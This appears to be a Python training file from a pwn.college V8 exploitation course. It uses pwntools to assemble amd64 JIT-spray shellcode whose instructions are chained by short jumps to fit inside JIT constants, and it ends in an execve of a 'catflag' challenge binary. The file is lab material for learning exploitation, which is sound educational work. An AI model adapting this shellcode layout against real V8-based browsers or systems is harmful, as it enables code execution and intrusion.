pwn-learning/JavaScript/PwnCollegeV8Exploitation/ShellCode/Level2_catflag_V8JITSpray.py

from pwn import context, shellcraft
from common import *
context(arch = 'amd64', os = 'linux')

# execve("catflag", NULL, NULL)

assembly = f"""
/* Craft envp to rdx */
xor     rdx, rdx            /* 3 */
/* Craft argv to rsi */
xor     rsi, rsi            /* 3 */
jmp     (. + 0x2) + 0xc     /* 2 */
/* Craft pathname to rdi */
mov     eax, 0x0067616c     /* 5 */
nop
jmp     (. + 0x2) + 0xc     /* 2 */

shl     rax, 32             /* 4 */
nop
nop
jmp     (. + 0x2) + 0xc     /* 2 */

mov     ebx, 0x66746163     /* 5 */
nop
jmp     (. + 0x2) + 0xc     /* 2 */

or      rax, rbx            /* 3 */
push    rax                 /* 1 */
nop
nop
jmp     (. + 0x2) + 0xc     /* 2 */

mov     rdi, rsp            /* 3 */
nop
nop
nop
jmp     (. + 0x2) + 0xc     /* 2 */

/* syscall execve */
{shellcraft.amd64.linux.syscall("SYS_execve", "rdi", "rsi", "rdx")}         /* 5 */
int3                        /* 1 */
int3                        /* 1 */
int3                        /* 1 */
""".strip()

dump_machine_code(assembly)